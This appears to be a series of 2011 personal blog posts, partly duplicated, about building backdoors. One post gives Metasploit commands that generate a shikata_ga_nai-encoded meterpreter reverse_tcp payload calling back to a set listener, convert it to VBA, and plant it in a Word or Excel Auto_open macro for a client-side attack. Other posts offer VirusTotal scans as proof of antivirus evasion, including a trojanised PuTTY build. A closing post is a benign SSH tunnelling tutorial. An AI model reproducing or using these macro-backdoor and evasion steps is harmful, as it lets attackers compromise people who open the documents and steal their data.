This is the way on how I embedded it.
root@LM:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 R | ./msfencode -t exe -e x86/shikata_ga_nai X > payload.exe
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
root@LM:/opt/metasploit3/msf#
root@LM:/opt/metasploit3/msf3# mv payload.exe tools/
root@LM:/opt/metasploit3/msf3/tools# ruby exe2vba.rb payload.exe payload.vbs
[*] Converted 73802 bytes of EXE into a VBA script
#payload.vbs
Now open your MS WORD/EXECL and perform this following step.
In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor, if you’re using Word/Excel 2007, go to View Macros, then place a name like “lancit” and select “create”.
It's will pop-up a visual basic editor and paste the output of the payload.vbs and safe it.Put any word you in your actual word doc itself.The purpose is for the client-side-attack.
The Output is like this :
Sub Auto_open()
.
.
.
.
.
.
End Sub
Then you will get a nice undetectable antivirus backdoor.
Happy Trying...
Tuesday, May 24, 2011
(Backdoor Part 2)At last..Payload CANT BE DETECTED..!!
Why its cant be detected,where at first I encode it with *.exe then I manipulate it using ruby to be embedded inside *.vbs extension and below is the result from virus total.
File name:payload.vbs
Submission date:2011-05-23 17:32:43 (UTC)
Current status:finished
Result:0/ 42 (0.0%)
Additional information
MD5 : 8e54f3b36507c7c3f4a80ee336e367ae
SHA1 : ed8ba524a09494dcd7f86dbe5859339706264911
SHA256: 3ff926d2c6dfcee6443de3f0f0916a5ce1d1ccebe6f55399fcb8118758fc041d
ssdeep: 6144:kgwFOmxCAB1vR5CGikL/xz+fk+8yXRruNG63b/IjRuePX7k49TQ7rBlLRc3aT+ch:vwEmw
AvvR5CbS/9R+86RruNbLgduePXI
File size : 297145 bytes
First seen: 2011-05-23 17:32:43
Last seen : 2011-05-23 17:32:43
TrID:
Unknown!
sigcheck:
publisher....: n/a
copyright....: n/a
product......: n/a
description..: n/a
original name: n/a
internal name: n/a
file version.: n/a
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned
File name:payload.vbs
Submission date:2011-05-23 17:32:43 (UTC)
Current status:finished
Result:0/ 42 (0.0%)
Additional information
MD5 : 8e54f3b36507c7c3f4a80ee336e367ae
SHA1 : ed8ba524a09494dcd7f86dbe5859339706264911
SHA256: 3ff926d2c6dfcee6443de3f0f0916a5ce1d1ccebe6f55399fcb8118758fc041d
ssdeep: 6144:kgwFOmxCAB1vR5CGikL/xz+fk+8yXRruNG63b/IjRuePX7k49TQ7rBlLRc3aT+ch:vwEmw
AvvR5CbS/9R+86RruNbLgduePXI
File size : 297145 bytes
First seen: 2011-05-23 17:32:43
Last seen : 2011-05-23 17:32:43
TrID:
Unknown!
sigcheck:
publisher....: n/a
copyright....: n/a
product......: n/a
description..: n/a
original name: n/a
internal name: n/a
file version.: n/a
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned
Monday, May 23, 2011
(Backdoor Part 1)Not A Successful Embedded PAYLOAD in Putty. But close Enough.. :D
Hi Guys,
Tonight I manage to embedded PAYLOAD inside putty and according to VirusTotal I manage to be detected (As Below Result).
File name:putty01.exe
Result:18/ 42 (42.9%)
The AV that detected are :
AntiVir 7.11.8.89 2011.05.21 TR/Crypt.XPACK.Gen
Avast 4.8.1351.0 2011.05.22 Win32:Vykuk
Avast5 5.0.677.0 2011.05.22 Win32:Vykuk
BitDefender 7.2 2011.05.22 Backdoor.Shell.AC
CAT-QuickHeal 11.00 2011.05.22 (Suspicious) - DNAScan
Commtouch 5.3.2.6 2011.05.22 W32/Swrort.D
Comodo 8797 2011.05.22 Heur.Corrupt.PE
DrWeb 5.0.2.03300 2011.05.22 Trojan.Packed.196
eSafe 7.0.17.0 2011.05.22 Suspicious File
F-Prot 4.6.2.117 2011.05.22 W32/Swrort.D
F-Secure 9.0.16440.0 2011.05.22 Backdoor.Shell.AC
GData 22 2011.05.22 Backdoor.Shell.AC
Microsoft 1.6903 2011.05.22 Trojan:Win32/Swrort.A
NOD32 6142 2011.05.22 a variant of Win32/Rozena.AG
Norman 6.07.07 2011.05.22 W32/Swrort.A
nProtect 2011-05-22.01 2011.05.22 Backdoor/W32.Shell.458752
Sophos 4.65.0 2011.05.22 Mal/Swrort-D
VIPRE 9357 2011.05.22 Trojan.Win32.Swrort.B (v)
As you can see the result from Microsoft Anti Malware ( I think ) :P its detected as a Trojan.
This Embedded Project is still in progress and will kept you updated if im not lazy enough -.-'
Opsss..Its late already..of to bed now..cheerio...
Tonight I manage to embedded PAYLOAD inside putty and according to VirusTotal I manage to be detected (As Below Result).
File name:putty01.exe
Result:18/ 42 (42.9%)
The AV that detected are :
AntiVir 7.11.8.89 2011.05.21 TR/Crypt.XPACK.Gen
Avast 4.8.1351.0 2011.05.22 Win32:Vykuk
Avast5 5.0.677.0 2011.05.22 Win32:Vykuk
BitDefender 7.2 2011.05.22 Backdoor.Shell.AC
CAT-QuickHeal 11.00 2011.05.22 (Suspicious) - DNAScan
Commtouch 5.3.2.6 2011.05.22 W32/Swrort.D
Comodo 8797 2011.05.22 Heur.Corrupt.PE
DrWeb 5.0.2.03300 2011.05.22 Trojan.Packed.196
eSafe 7.0.17.0 2011.05.22 Suspicious File
F-Prot 4.6.2.117 2011.05.22 W32/Swrort.D
F-Secure 9.0.16440.0 2011.05.22 Backdoor.Shell.AC
GData 22 2011.05.22 Backdoor.Shell.AC
Microsoft 1.6903 2011.05.22 Trojan:Win32/Swrort.A
NOD32 6142 2011.05.22 a variant of Win32/Rozena.AG
Norman 6.07.07 2011.05.22 W32/Swrort.A
nProtect 2011-05-22.01 2011.05.22 Backdoor/W32.Shell.458752
Sophos 4.65.0 2011.05.22 Mal/Swrort-D
VIPRE 9357 2011.05.22 Trojan.Win32.Swrort.B (v)
As you can see the result from Microsoft Anti Malware ( I think ) :P its detected as a Trojan.
This Embedded Project is still in progress and will kept you updated if im not lazy enough -.-'
Opsss..Its late already..of to bed now..cheerio...
Monday, May 16, 2011
What is SSH and How to configure a SSH Reverse Tunnel
A simple Explanation of SSH.
Secure SHell
Connectivity tools for secure communications over the internet. SSH is a replacement for:telnet & rlogin.All communication is encrypted.
Purpose Common used of SSH:
1.You want to access a web interface that lies behind a firewall
2.You want to secure your communications when you are in a public WLAN
Step Take(By Problem)
=========
1.Problem: the server you want to access, can only be reached via VPN
Solution: create a reverse tunnel
Login to your server over your VPN
ssh -R 9995:localhost:22 your.ssh-server.net
if you are logged in on your.ssh-server.net you can now access the remote
server without vpn:
ssh -p 9995 localhost
2.Forward all your traffic through a tunnel
Connet to your server at first.
ssh -D 8888 your.ssh-server.net
Define a SOCKS-Proxy in your Browser settings with host '127.0.0.1' and port '8888'
Now all your traffic seems to come from that host!
Enjoy!
Secure SHell
Connectivity tools for secure communications over the internet. SSH is a replacement for:telnet & rlogin.All communication is encrypted.
Purpose Common used of SSH:
1.You want to access a web interface that lies behind a firewall
2.You want to secure your communications when you are in a public WLAN
Step Take(By Problem)
=========
1.Problem: the server you want to access, can only be reached via VPN
Solution: create a reverse tunnel
Login to your server over your VPN
ssh -R 9995:localhost:22 your.ssh-server.net
if you are logged in on your.ssh-server.net you can now access the remote
server without vpn:
ssh -p 9995 localhost
2.Forward all your traffic through a tunnel
Connet to your server at first.
ssh -D 8888 your.ssh-server.net
Define a SOCKS-Proxy in your Browser settings with host '127.0.0.1' and port '8888'
Now all your traffic seems to come from that host!
Enjoy!
Subscribe to:
Posts (Atom)